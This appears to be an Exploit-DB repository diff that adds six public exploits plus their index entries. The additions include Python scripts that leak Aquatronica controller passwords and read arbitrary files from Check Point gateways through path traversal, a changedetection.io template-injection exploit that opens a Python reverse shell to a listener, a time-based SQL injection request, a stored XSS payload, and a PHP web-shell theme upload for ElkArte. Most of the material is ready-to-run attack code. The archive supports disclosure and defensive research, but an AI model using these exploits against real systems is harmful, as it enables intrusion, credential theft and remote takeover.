DB: 2024-06-01

7 changes to exploits/shellcodes/ghdb

Aquatronica Control System 5.1.6 - Information Disclosure

Check Point Security Gateway - Information Disclosure (Unauthenticated)

changedetection < 0.45.20 - Remote Code Execution (RCE)

BWL Advanced FAQ Manager 2.0.3 - Authenticated SQL Injection

ElkArte Forum 1.1.9 - Remote Code Execution (RCE) (Authenticated)

iMLog < 1.307 - Persistent Cross Site Scripting (XSS)

exploits/hardware/webapps/52028.py

@@ -0,0 +1,86 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+#
+#
+# Aquatronica Control System 5.1.6 Passwords Leak Vulnerability
+#
+#
+# Vendor: Aquatronica s.r.l.
+# Product web page: https://www.aquatronica.com
+# Affected version: Firmware: 5.1.6
+#                   Web: 2.0
+#
+# Summary: Aquatronica's electronic AQUARIUM CONTROLLER is easy
+# to use, allowing you to control all the electrical devices in
+# an aquarium and to monitor all their parameters; it can be used
+# for soft water aquariums, salt water aquariums or both simultaneously.
+#
+# Desc: The tcp.php endpoint on the Aquatronica controller is exposed
+# to unauthenticated attackers over the network. This vulnerability
+# allows remote attackers to send a POST request which can reveal
+# sensitive configuration information, including plaintext passwords.
+# This can lead to unauthorized access and control over the aquarium
+# controller, compromising its security and potentially allowing attackers
+# to manipulate its settings.
+#
+# Tested on: Apache/2.0.54 (Unix)
+#            PHP/5.4.17
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#                             @zeroscience
+#
+#
+# Advisory ID: ZSL-2024-5824
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5824.php
+#
+#
+# 04.05.2024
+#
+
+import requests, html, re, sys, time
+from urllib.parse import unquote
+
+program     = "TCP"
+command     = "ws_get_network_cfg"
+function_id = "TCP_XML_REQUEST"
+
+print("""
+      _________         .    .
+     (..       \_    ,  |\  /|
+      \       O  \  /|  \ \/ /
+       \______    \/ |   \  /
+          vvvv\    \ |   /  |
+          \^^^^  ==   \_/   |
+           `\_   ===    \.  |
+           / /\_   \ /      |
+           |/   \_  \|      /
+___ ______________\________/________aquatronica_0day___
+  | |
+  | |
+  | |
+""")
+
+if len(sys.argv) != 2:
+    print("Usage: python aqua.py <ip:port>")
+    sys.exit(1)
+
+ip = sys.argv[1]
+url = f"http://{ip}/{program.lower()}.php"
+
+post_data = {'function_id' : function_id.lower(),
+             'command'     :     command.upper()}
+
+r = requests.post(url, data=post_data)
+
+if r.status_code == 200:
+    r_d = unquote(r.text)
+    f_d_r = html.unescape(r_d)
+    regex = r'pwd="([^"]+)"'
+    rain = re.findall(regex, f_d_r)
+
+    for drops in rain:
+        print(' ',drops)
+        time.sleep(0.5)
+else:
+    print(f"Dry season! {r.status_code}")

exploits/hardware/webapps/52029.py

@@ -0,0 +1,59 @@
+# Exploit Title:  Check Point Security Gateway - Information Disclosure (Unauthenticated)
+# Exploit Author: Yesith Alvarez
+# Vendor Homepage: https://support.checkpoint.com/results/sk/sk182336
+# Version: R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20
+# CVE : CVE-2024-24919
+
+from requests import Request, Session
+import sys
+import json
+
+
+
+def title():
+    print('''
+
+   _______      ________    ___   ___ ___  _  _        ___  _  _   ___  __  ___
+  / ____\ \    / /  ____|  |__ \ / _ \__ \| || |      |__ \| || | / _ \/_ |/ _ \
+ | |     \ \  / /| |__ ______ ) | | | | ) | || |_ ______ ) | || || (_) || | (_) |
+ | |      \ \/ / |  __|______/ /| | | |/ /|__   _|______/ /|__   _\__, || |\__, |
+ | |____   \  /  | |____    / /_| |_| / /_   | |       / /_   | |   / / | |  / /
+  \_____|   \/   |______|  |____|\___/____|  |_|      |____|  |_|  /_/  |_| /_/
+
+
+
+
+Author: Yesith Alvarez
+Github: https://github.com/yealvarez
+Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
+    ''')
+
+def exploit(url, path):
+	url = url + '/clients/MyCRL'
+	data = 	"aCSHELL/../../../../../../../../../../.."+ path
+	headers = {
+		'Connection': 'keep-alive',
+        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0'
+	}
+	s = Session()
+	req = Request('POST', url, data=data, headers=headers)
+	prepped = req.prepare()
+	#del prepped.headers['Content-Type']
+	resp = s.send(prepped,
+	    verify=False,
+	    timeout=15
+	)
+	print(prepped.headers)
+	print(url)
+	print(resp.headers)
+	print(resp.status_code)
+
+
+if __name__ == '__main__':
+    title()
+    if(len(sys.argv) < 3):
+    	print('[+] USAGE: python3 %s https://<target_url> path\n'%(sys.argv[0]))
+    	print('[+] EXAMPLE: python3 %s https://192.168.0.10 "/etc/passwd"\n'%(sys.argv[0]))
+    	exit(0)
+    else:
+    	exploit(sys.argv[1],sys.argv[2])

exploits/multiple/webapps/52027.py

@@ -0,0 +1,125 @@
+# Exploit Title: changedetection <= 0.45.20 Remote Code Execution (RCE)
+# Date: 5-26-2024
+# Exploit Author: Zach Crosman (zcrosman)
+# Vendor Homepage: changedetection.io
+# Software Link: https://github.com/dgtlmoon/changedetection.io
+# Version: <= 0.45.20
+# Tested on: Linux
+# CVE : CVE-2024-32651
+
+from pwn import *
+import requests
+from bs4 import BeautifulSoup
+import argparse
+
+def start_listener(port):
+    listener = listen(port)
+    print(f"Listening on port {port}...")
+    conn = listener.wait_for_connection()
+    print("Connection received!")
+    context.newline = b'\r\n'
+    # Switch to interactive mode
+    conn.interactive()
+
+def add_detection(url, listen_ip, listen_port, notification_url=''):
+    session = requests.Session()
+
+    # First request to get CSRF token
+    request1_headers = {
+        "Cache-Control": "max-age=0",
+        "Upgrade-Insecure-Requests": "1",
+        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
+        "Accept-Encoding": "gzip, deflate",
+        "Accept-Language": "en-US,en;q=0.9",
+        "Connection": "close"
+    }
+
+    response = session.get(url, headers=request1_headers)
+    soup = BeautifulSoup(response.text, 'html.parser')
+    csrf_token = soup.find('input', {'name': 'csrf_token'})['value']
+    print(f'Obtained CSRF token: {csrf_token}')
+
+    # Second request to submit the form and get the redirect URL
+    add_url = f"{url}/form/add/quickwatch"
+    add_url_headers = {  # Define add_url_headers here
+        "Origin": url,
+        "Content-Type": "application/x-www-form-urlencoded"
+    }
+    add_url_data = {
+        "csrf_token": csrf_token,
+        "url": "https://reddit.com/r/baseball",
+        "tags": '',
+        "edit_and_watch_submit_button": "Edit > Watch",
+        "processor": "text_json_diff"
+    }
+
+    post_response = session.post(add_url, headers=add_url_headers, data=add_url_data, allow_redirects=False)
+
+    # Extract the URL from the Location header
+    if 'Location' in post_response.headers:
+        redirect_url = post_response.headers['Location']
+        print(f'Redirect URL: {redirect_url}')
+    else:
+        print('No redirect URL found')
+        return
+
+    # Third request to add the changedetection url with ssti in notification config
+    save_detection_url = f"{url}{redirect_url}"
+    save_detection_headers = {  # Define save_detection_headers here
+        "Referer": redirect_url,
+        "Cookie": f"session={session.cookies.get('session')}"
+    }
+
+    save_detection_data = {
+        "csrf_token": csrf_token,
+        "url": "https://reddit.com/r/all",
+        "title": '',
+        "tags": '',
+        "time_between_check-weeks": '',
+        "time_between_check-days": '',
+        "time_between_check-hours": '',
+        "time_between_check-minutes": '',
+        "time_between_check-seconds": '30',
+        "filter_failure_notification_send": 'y',
+        "fetch_backend": 'system',
+        "webdriver_delay": '',
+        "webdriver_js_execute_code": '',
+        "method": 'GET',
+        "headers": '',
+        "body": '',
+        "notification_urls": notification_url,
+        "notification_title": '',
+        "notification_body": f"""
+        {{% for x in ().__class__.__base__.__subclasses__() %}}
+        {{% if "warning" in x.__name__ %}}
+        {{{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\\"{listen_ip}\\",{listen_port}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\\"/bin/bash\\")'").read()}}}}
+        {{% endif %}}
+        {{% endfor %}}
+        """,
+        "notification_format": 'System default',
+        "include_filters": '',
+        "subtractive_selectors": '',
+        "filter_text_added": 'y',
+        "filter_text_replaced": 'y',
+        "filter_text_removed": 'y',
+        "trigger_text": '',
+        "ignore_text": '',
+        "text_should_not_be_present": '',
+        "extract_text": '',
+        "save_button": 'Save'
+    }
+    final_response = session.post(save_detection_url, headers=save_detection_headers, data=save_detection_data)
+
+    print('Final request made.')
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(description='Add detection and start listener')
+    parser.add_argument('--url', type=str, required=True, help='Base URL of the target site')
+    parser.add_argument('--port', type=int, help='Port for the listener', default=4444)
+    parser.add_argument('--ip', type=str, required=True, help='IP address for the listener')
+    parser.add_argument('--notification', type=str, help='Notification url if you don\'t want to use the system default')
+    args = parser.parse_args()
+
+
+    add_detection(args.url, args.ip, args.port, args.notification)
+    start_listener(args.port)

exploits/php/webapps/52024.txt

@@ -0,0 +1,47 @@
+Exploit Title: BWL Advanced FAQ Manager 2.0.3 - Authenticated SQL Injection
+Date: 14 Apr 2024
+Exploit Author: Ivan Spiridonov (xbz0n)
+Software Link: https://codecanyon.net/item/bwl-advanced-faq-manager/5007135
+Version: 2.0.3
+Tested on: Ubuntu 20.04
+CVE: CVE-2024-32136
+
+SQL Injection
+
+SQL injection is a type of security vulnerability that allows an attacker to interfere with an application's database queries. It usually involves the insertion or "injection" of an SQL query via the input data from the client into the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.
+
+Affected Components
+
+Plugin: BWL Advanced FAQ Manager
+Version: 2.0.3
+Affected Parameter: 'date_range'
+Affected Page: /wp-admin/edit.php
+Description
+
+The vulnerability exists within the 'date_range' parameter used in the 'bwl-advanced-faq-analytics' page of the BWL Advanced FAQ Manager plugin. Authenticated attackers can execute arbitrary SQL commands within the database by manipulating the input to this parameter.
+
+Proof of Concept
+
+Manual Exploitation
+
+The following GET request demonstrates the vulnerability:
+
+GET /wp-admin/edit.php?page=bwl-advanced-faq-analytics&post_type=bwl_advanced_faq&filter_type=views&date_range=(select*from(select(sleep(20)))a)&faq_id=all HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Referer: http://localhost/wp-admin/edit.php?post_type=bwl_advanced_faq&page=bwl-advanced-faq-analytics
+Connection: close
+Cookie: [Relevant Cookies]
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+If the server response is delayed by approximately 20 seconds, it indicates a successful exploitation of the time-based SQL Injection, confirming the vulnerability.
+
+Recommendations
+
+BWL Advanced FAQ Manager v2.0.3 users are advised to update the plugin to the fixed version v2.0.4.

exploits/php/webapps/52025.txt

@@ -0,0 +1,19 @@
+# Exploit Title: iMLog < 1.307 - Persistent Cross Site Scripting (XSS)
+# Date: 22/5/2024
+# Exploit Author: Gabriel Felipe
+# Vendor Homepage: https://itssglobal.com
+# Software Link: https://itssglobal.com/index.php/imlog/
+# Version: 1.307
+# Tested on: Firefox and Chrome Browsers
+# Patched Version: 1.308
+# Category: Web Application
+# PoC:
+
+iMLog < 1.307 is vulnerable to persistent cross-site scripting (XSS) via the "User Management" feature. An attacker could inject malicious javascript code on a controlled user so when an admin goes to the "User Maintenance" malicious code is executed and could lead to new admin user creations resulting in privilege escalation.
+
+1. Login to user account
+2. Go to Setup > "User Maintenance"
+3. Click on "Search" and then select your UserID.
+4. Change the "Last Name" input to `<img/src/onerror=prompt('XSS')>`
+5. Click on "Save"
+6. Refresh the page, XSS will be triggered.

exploits/php/webapps/52026.txt

@@ -0,0 +1,13 @@
+# Exploit Title : ElkArte Forum 1.1.9 - Remote Code Execution (RCE) (Authenticated)
+# Date: 2024-5-24
+# Exploit Author: tmrswrr
+# Category: Webapps
+# Vendor Homepage: https://www.elkarte.net/
+# Software Link : https://github.com/elkarte/Elkarte/releases/download/v1.1.9/ElkArte_v1-1-9_install.zip
+# Version : 1.1.9
+
+
+1) After login go to Manage and Install theme > https://127.0.0.1/ElkArte/index.php?action=admin;area=theme;sa=admin;c2e3e39a0d=276c2e3e39a0d65W2qg1voAFfX1yNc5m
+2) Upload test.zip file and click install > test.zip > test.php > <?php echo system('id'); ?>
+3) Go to Theme Setting > Theme Directory > https://127.0.0.1/ElkArte/themes/test/test.php
+Result : uid=1000(ElkArte) gid=1000(ElkArte) groups=1000(ElkArte) uid=1000(ElkArte) gid=1000(ElkArte) groups=1000(ElkArte)

files_exploits.csv

@@ -4072,6 +4072,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47188,exploits/hardware/webapps/47188.py,"Amcrest Cameras 2.520.AC00.18.R - Unauthenticated Audio Streaming",2019-07-30,"Jacob Baines",webapps,hardware,,2019-07-30,2019-07-30,1,CVE-2019-3948,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,https://www.tenable.com/security/research/tra-2019-36
 37298,exploits/hardware/webapps/37298.txt,"Apexis IP CAM - Information Disclosure",2015-06-16,"Sunplace Solutions",webapps,hardware,80,2015-06-16,2016-10-10,1,OSVDB-123251,,,,,
 48127,exploits/hardware/webapps/48127.pl,"Aptina AR0130 960P 1.3MP Camera - Remote Configuration Disclosure",2020-02-24,"Todor Donev",webapps,hardware,,2020-02-24,2020-02-24,0,,,,,,
+52028,exploits/hardware/webapps/52028.py,"Aquatronica Control System 5.1.6 - Information Disclosure",2024-05-31,LiquidWorm,webapps,hardware,,2024-05-31,2024-05-31,0,,,,,,
 40901,exploits/hardware/webapps/40901.txt,"ARG-W4 ADSL Router - Multiple Vulnerabilities",2016-12-11,"Persian Hack Team",webapps,hardware,,2016-12-11,2016-12-11,0,,,,,,
 32369,exploits/hardware/webapps/32369.txt,"Array Networks vxAG 9.2.0.34 and vAPV 8.3.2.17 - Multiple Vulnerabilities",2014-03-19,xistence,webapps,hardware,,2014-03-19,2014-03-19,0,OSVDB-104654;OSVDB-104653;OSVDB-104652,,,,,
 29131,exploits/hardware/webapps/29131.rb,"ARRIS DG860A - NVRAM Backup Password Disclosure",2013-10-22,"Justin Oberdorf",webapps,hardware,80,2013-10-22,2013-10-22,0,OSVDB-98759,,,,,
@@ -4163,6 +4164,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 35075,exploits/hardware/webapps/35075.txt,"CBN CH6640E/CG6640E Wireless Gateway Series - Multiple Vulnerabilities",2014-10-27,LiquidWorm,webapps,hardware,,2014-10-27,2014-10-27,0,CVE-2014-8657;CVE-2014-8655;OSVDB-113838;OSVDB-113837;CVE-2014-8653;CVE-2014-8654;CVE-2014-8656,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php
 45021,exploits/hardware/webapps/45021.txt,"Cela Link CLR-M20 2.7.1.6 - Arbitrary File Upload",2018-07-13,"Safak Aslan",webapps,hardware,,2018-07-13,2018-08-08,0,CVE-2018-15137,,,,,
 47669,exploits/hardware/webapps/47669.sh,"Centova Cast 3.2.11 - Arbitrary File Download",2019-11-18,DroidU,webapps,hardware,,2019-11-18,2019-11-18,0,,,,,,
+52029,exploits/hardware/webapps/52029.py,"Check Point Security Gateway - Information Disclosure (Unauthenticated)",2024-05-31,"Yesith Alvarez",webapps,hardware,,2024-05-31,2024-05-31,0,,,,,,
 22493,exploits/hardware/webapps/22493.txt,"CheckPoint/Sofaware Firewall - Multiple Vulnerabilities",2012-11-05,Procheckup,webapps,hardware,,2012-11-05,2012-11-05,0,OSVDB-87243;OSVDB-87242;OSVDB-87241;OSVDB-87240;OSVDB-76675;OSVDB-76674;OSVDB-76673;OSVDB-76672,,,,,
 49937,exploits/hardware/webapps/49937.txt,"CHIYU IoT Devices - Denial of Service (DoS)",2021-06-03,sirpedrotavares,webapps,hardware,,2021-06-03,2021-10-29,0,CVE-2021-31642,,,,,
 35556,exploits/hardware/webapps/35556.txt,"CIK Telecom VoIP Router SVG6000RW - Privilege Escalation / Command Execution",2014-12-17,Chako,webapps,hardware,,2014-12-17,2014-12-17,0,OSVDB-115982;OSVDB-115981,,,,,
@@ -11759,6 +11761,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48558,exploits/multiple/webapps/48558.txt,"Cayin Digital Signage System xPost 2.5 - Remote Command Injection",2020-06-04,LiquidWorm,webapps,multiple,,2020-06-04,2020-06-04,0,,,,,,
 48557,exploits/multiple/webapps/48557.py,"Cayin Signage Media Player 3.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple,,2020-06-04,2020-06-04,0,,,,,,
 49981,exploits/multiple/webapps/49981.txt,"Cerberus FTP Web Service 11 - 'svg' Stored Cross-Site Scripting (XSS)",2021-06-11,"Mohammad Hossein Kaviyany",webapps,multiple,,2021-06-11,2021-06-14,0,CVE-2019-25046,,,,,
+52027,exploits/multiple/webapps/52027.py,"changedetection < 0.45.20 - Remote Code Execution (RCE)",2024-05-31,"Zach Crosman (zcrosman)",webapps,multiple,,2024-05-31,2024-05-31,0,,,,,,
 49859,exploits/multiple/webapps/49859.txt,"Chevereto 3.17.1 - Cross Site Scripting (Stored)",2021-05-12,"Akıner Kısa",webapps,multiple,,2021-05-12,2021-05-12,0,,,,,,
 49171,exploits/multiple/webapps/49171.txt,"ChurchCRM 4.2.0 - CSV/Formula Injection",2020-12-02,"Mufaddal Masalawala",webapps,multiple,,2020-12-02,2020-12-02,0,,,,,,
 49172,exploits/multiple/webapps/49172.txt,"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)",2020-12-02,"Mufaddal Masalawala",webapps,multiple,,2020-12-02,2020-12-02,0,,,,,,
@@ -15317,6 +15320,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 6527,exploits/php/webapps/6527.txt,"BuzzyWall 1.3.1 - 'search' SQL Injection",2008-09-22,~!Dok_tOR!~,webapps,php,,2008-09-21,2016-12-22,1,OSVDB-48532;CVE-2008-6029,,,,,
 36214,exploits/php/webapps/36214.txt,"BuzzyWall 1.3.2 - 'resolute.php' Information Disclosure",2011-10-07,cr4wl3r,webapps,php,,2011-10-07,2016-12-22,1,,,,,,https://www.securityfocus.com/bid/50018/info
 4213,exploits/php/webapps/4213.txt,"bwired - 'index.php?newsID' SQL Injection",2007-07-22,g00ns,webapps,php,,2007-07-21,,1,OSVDB-39137;CVE-2007-3978;OSVDB-39136;CVE-2007-3977;OSVDB-39135;CVE-2007-3976,,,,,
+52024,exploits/php/webapps/52024.txt,"BWL Advanced FAQ Manager 2.0.3 - Authenticated SQL Injection",2024-05-31,"Ivan Spiridonov",webapps,php,,2024-05-31,2024-05-31,0,,,,,,
 1513,exploits/php/webapps/1513.php,"BXCP 0.2.9.9 - 'tid' SQL Injection",2006-02-19,x128,webapps,php,,2006-02-18,,1,OSVDB-23355;CVE-2006-0821,,,,,
 1975,exploits/php/webapps/1975.pl,"BXCP 0.3.0.4 - 'where' SQL Injection",2006-07-02,x23,webapps,php,,2006-07-01,,1,OSVDB-26938;CVE-2006-3394,,,,,
 14563,exploits/php/webapps/14563.html,"BXR 0.6.8 - Cross-Site Request Forgery",2010-08-05,"High-Tech Bridge SA",webapps,php,,2010-08-05,2010-08-05,0,,,,,http://www.exploit-db.combxr_0.6.8.tar.gz,http://www.htbridge.ch/advisory/xsrf_csrf_in_bxr.html
@@ -17947,6 +17951,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 4114,exploits/php/webapps/4114.txt,"Elkagroup Image Gallery 1.0 - SQL Injection",2007-06-26,t0pP8uZz,webapps,php,,2007-06-25,,1,OSVDB-36294;CVE-2007-3461,,,,,
 49121,exploits/php/webapps/49121.txt,"ElkarBackup 1.3.3 - 'Policy[name]' and 'Policy[Description]' Stored Cross-site Scripting",2020-11-27,"Vyshnav nk",webapps,php,,2020-11-27,2020-11-27,0,,,,,,
 48756,exploits/php/webapps/48756.txt,"ElkarBackup 1.3.3 - Persistent Cross-Site Scripting",2020-08-20,"Enes Özeser",webapps,php,,2020-08-20,2020-08-20,0,,,,,,
+52026,exploits/php/webapps/52026.txt,"ElkArte Forum 1.1.9 - Remote Code Execution (RCE) (Authenticated)",2024-05-31,tmrswrr,webapps,php,,2024-05-31,2024-05-31,0,,,,,,
 13785,exploits/php/webapps/13785.txt,"eLms Pro - SQL Injection / Cross-Site Scripting",2010-06-09,Sid3^effects,webapps,php,,2010-06-08,,1,CVE-2010-2356;CVE-2010-2355;CVE-2010-2354;OSVDB-65663;OSVDB-65423;OSVDB-65422,,,,,
 15404,exploits/php/webapps/15404.txt,"eLouai's Force Download Script - Arbitrary Local File Download",2010-11-03,v1R00Z,webapps,php,,2010-11-03,2010-11-03,1,,,,,,
 28708,exploits/php/webapps/28708.txt,"elproLOG MONITOR Webaccess 2.1 - Multiple Vulnerabilities",2013-10-04,Vulnerability-Lab,webapps,php,80,2013-10-04,2013-10-04,0,OSVDB-97724;OSVDB-97723;OSVDB-97722,,,,,https://www.vulnerability-lab.com/get_content.php?id=1086
@@ -20052,6 +20057,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 5631,exploits/php/webapps/5631.txt,"IMGallery 2.5 - Multiple SQL Injections",2008-05-15,cOndemned,webapps,php,,2008-05-14,,1,OSVDB-45472;CVE-2008-2337;OSVDB-45471;OSVDB-45470,,,,,
 43567,exploits/php/webapps/43567.txt,"ImgHosting 1.5 - Cross-Site Scripting",2018-01-15,"Dennis Veninga",webapps,php,,2018-01-15,2018-01-15,0,CVE-2018-5479,,,,,
 18544,exploits/php/webapps/18544.txt,"ImgPals Photo Host 1.0 - Admin Account Disactivation",2012-02-29,CorryL,webapps,php,,2012-02-29,2012-02-29,0,OSVDB-85701;CVE-2012-4926;CVE-2012-4925;OSVDB-79670,,,,,
+52025,exploits/php/webapps/52025.txt,"iMLog < 1.307 - Persistent Cross Site Scripting (XSS)",2024-05-31,"Gabriel Felipe",webapps,php,,2024-05-31,2024-05-31,0,,,,,,
 15754,exploits/php/webapps/15754.txt,"Immo Makler Script - SQL Injection",2010-12-17,"Easy Laster",webapps,php,,2010-12-17,2010-12-17,1,OSVDB-69950;CVE-2010-4721,,,,,
 35866,exploits/php/webapps/35866.txt,"Immophp 1.1.1 - Cross-Site Scripting / SQL Injection",2011-06-18,KedAns-Dz,webapps,php,,2011-06-18,2015-01-22,1,,,,,,https://www.securityfocus.com/bid/48341/info
 34389,exploits/php/webapps/34389.txt,"Impact Software AdPeeps - Cross-Site Scripting / HTML Injection",2010-07-27,Matt,webapps,php,,2010-07-27,2016-10-27,1,CVE-2009-4939;OSVDB-54790,,,,,https://www.securityfocus.com/bid/42071/info